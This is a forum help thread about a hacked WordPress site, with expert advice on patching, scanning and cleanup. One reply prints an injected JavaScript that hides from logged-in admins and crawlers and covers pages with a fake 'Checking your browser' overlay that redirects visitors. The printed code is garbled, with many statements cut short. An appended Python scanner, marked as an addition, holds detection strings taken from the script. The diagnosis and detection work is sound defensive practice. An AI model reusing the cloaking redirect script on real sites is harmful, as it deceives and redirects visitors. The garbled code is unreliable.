php website

romeiovasu used Ask the Experts™
I have a website; suddenly something happened to the WordPress website and the menu started showing on the top.  We came to know our site got compromised, and we are trying to fix this.  Can someone help me out to see what is wrong in the page?
Jim Horn, SQL Server Data Dude
Most Valuable Expert 2013
Author of the Year 2015

Curiosity overwhelms me ... Are you asking experts here to navigate to a site that is 'compromised', and if so, define 'compromised' for us.


No, the compromised one got fixed.  Now we are asking whether there is anything we can do to fix the CSS sheet.
Rob, Owner (Aidellio)
Most Valuable Expert 2015
That's not something you'll get a lot of attention on as none of us want our computers compromised.  I've opened the page in incognito, which still isn't ideal but it was enough to show that:

is the script causing your issues.  You'll find it included at the bottom of the page.  

WARNING to other experts: It creates tracking cookies and referrer cookies to obviously read when you click through to "check your browser"

But the real issue here is how it got there in the first place.  Does your site allow for content to be entered in any way?  How do you parse, filter and sanitize your input??

You should be reviewing all your code that accepts any kind of input with reference to filtering in PHP (including sanitization and validation):

Rob, Owner (Aidellio)
Most Valuable Expert 2015

no the compromised one is got fixed
Not  That IS still compromised



Hi Rob,

I didn't understand what you are saying.  If you don't mind, can you explain in more detail please?
Maclean, System Engineer

Problem here is that you won't know which files have been compromised, and which port was exploited or which vulnerability. As far as I can see you have malware running on it right now which was injected via javascript vulnerabilities, and might be best taking it offline to minimize loss of data if they are harvesting information using the vulnerability.

Personally I would be tempted to build a clean new server, make sure it is patched and secured.
You could try running a rootkit scanner or a malware sweep on it. ClamAV is often used to locate malware on Linux.

Unfortunately my expertise does not go much beyond this, and it would be best getting a professional opinion added to resolve your issue in full.

I found some info running a free scan for vulnerabilities here

Result =
Known javascript malware. Details:
Rob, Owner (Aidellio)
Most Valuable Expert 2015

Sorry, just remembered you mentioned it's a WordPress site.  Are you on the latest version of WordPress?  Are all your plugins and themes up to date?  Any one of these elements could have a vulnerability that exposed your site.
Rob, Owner (Aidellio)
Most Valuable Expert 2015

I agree with Maclean, you need a professional to sift through this or start from scratch on another server.   If you've got a lot of content then starting from scratch is going to be a pain.

The "malware" will most likely be in your database and injected by a malicious user so scanning your server will most likely turn up nothing.

Please refer to section 5 of my article below that has some information relating to cross site scripting and SQL/JS injection:

I found that js script by looking at the source code of the page.
Maclean, System Engineer

According to redbot you are using the PHP/5.4.45 engine.
This one has various vulnerabilities as it is behind in patch levels by about 2-3 months.

So I would say that the likely cause was not having patched the web server frequently.

I will leave things with Rob and others however, he seems to have a good knowledge on these problems.
Jason C. Levine, Don't talk to me.

Once a WordPress site has been compromised, you have to take a LOT of steps to make sure it is clean again. Maclean posted the link to Sucuri, which will scan the front-facing site for obvious vulnerabilities but there may be other, non-obvious backdoors now in your installation.  This article:

talks about steps you can take to attempt to recover but if you are not familiar with WordPress hacks and overall security issues, pay Sucuri to clean you up.
Scott Fell, Developer & EE Moderator
Fellow 2018
Most Valuable Expert 2013

Not fixed yet.  See line 451 (when you view source)

The code is on one line, but here I have expanded it.
function start() {
    function t(e) {
        var t = document.cookie,
            n = t.indexOf(" " + e + "=");
        n == -1 && (n = t.indexOf(e + "="));
        if (n == -1) t = null;
        else {
            n = t.indexOf("=", n) + 1;
            var r = t.indexOf(";", n);
            r == -1 && (r = t.length), t = unescape(t.substring(n, r))
        return t

    function n(e, t, n) {
        var r = new Date;
        r.setDate(r.getDate() + n);
        var i = escape(t) + (n == null ? "" : "; expires=" + r.toUTCString());
        document.cookie = e + "=" + i

    function r() {
        return document.cookie ? document.cookie.indexOf("wordpress_logged") !== -1 || document.cookie.indexOf("wp-settings") !== -1 || document.cookie.indexOf("referrerRedirectCookie") !== -1 || document.cookie.indexOf("wordpress_test") !== -1 ? (console.log("true"), !0) : (console.log("false2"), !1) : (console.log("false1"), !1)
    if (!r()) {
        n("referrerRedirectCookie", "do not redirect", 730);
        var e = navigator.userAgent;
        if (!e || e.length == 0) return;
        e = e.toLowerCase(), e.indexOf("google") == -1 && e.indexOf("bot") == -1 && e.indexOf("crawl") == -1 && hideWebSite()

function createPopup() {
    var e = document.createElement("div"); = "absolute", = "100%", = "100%", = 0, = 0, = "white", = 99999, document.body.appendChild(e), e.onclick = function() {
        window.location = w_location
    var t = document.createElement("p");
    return t.innerText = "Checking your browser before accessing " + + "...", = "center", = "x-large", = "relative", t.textContent = t.innerText, e.appendChild(t), e

function createButton() {
    var e = document.createElement("div");
    return = "absolute", = "20%", = "10%", = "10%", = "80%", = "1px solid black", = "center", = "middle", = "0, auto", = "pointer", = "xx-large", = "5px", e.onclick = function() {
        window.location = w_location
    }, e.onmouseover = function() { = "1px solid red", = "red"
    }, e.onmouseout = function() { = "1px solid black", = "black"
    }, e.innerText = "Continue", e.textContent = e.innerText, e
var w_location = "",
    hideWebSite = function() {
        var e = createPopup(),
            t = createButton();
    readyStateCheckInterval = setInterval(function() {
        if (document.readyState === "complete" || document.readyState == "interactive") clearInterval(readyStateCheckInterval), start()
    }, 10);
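
Added example (not part of any post in this thread, and not code from the affected site): Rob notes above that the injection most likely lives in the database, and the script Scott expanded contains distinctive strings. This Python sketch checks site files and a SQL dump for those strings; the sample rows, the file names and the two-weak-signals threshold are assumptions made for illustration.

```python
import re
from pathlib import Path

# Indicators copied from the injected script quoted in this thread.
STRONG = ("referrerRedirectCookie", "hideWebSite", "readyStateCheckInterval",
          "Checking your browser before accessing")
# Weaker signals: legitimate code can also test these, so one alone is not enough.
WEAK = (r'indexOf\(\s*["\']wordpress_logged', r'indexOf\(\s*["\']crawl["\']',
        r"window\.location\s*=\s*w_location")

def classify(text):
    """Return (verdict, hits) for one blob: a file body or a database row."""
    # SQL dumps store quotes as \" and \', so undo that before matching.
    text = text.replace('\\"', '"').replace("\\'", "'")
    strong = [s for s in STRONG if s in text]
    weak = [p for p in WEAK if re.search(p, text)]
    if strong:
        return "infected", strong + weak
    if len(weak) >= 2:
        return "suspicious", weak
    return "clean", weak

def scan(sources):
    """sources: iterable of (label, text). Returns {label: (verdict, hits)} for non-clean items."""
    report = {}
    for label, text in sources:
        verdict, hits = classify(text)
        if verdict != "clean":
            report[label] = (verdict, hits)
    return report

def read_tree(root, exts=(".php", ".js", ".html", ".sql")):
    """Yield (path, text) for site files and any database dump under root."""
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in exts:
            yield str(path), path.read_text(errors="replace")

# Constructed sample data (not taken from the affected site).
SAMPLES = [
    ("dump.sql:wp_options", "INSERT INTO wp_options VALUES (1,'footer_html',"
     "'<script>n(\\\"referrerRedirectCookie\\\",\\\"do not redirect\\\",730);</script>');"),
    ("theme/footer.php", "<?php wp_footer(); ?>\n</body></html>"),
    ("plugin/cache.js", 'if (document.cookie.indexOf("wordpress_logged") !== -1) skipCache();'),
]

if __name__ == "__main__":
    for label, (verdict, hits) in scan(SAMPLES).items():
        print(f"{label}: {verdict} {hits}")
```

To check a real installation, pass `read_tree()` the directory that holds the WordPress files and a database export, and feed its output to `scan()`.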
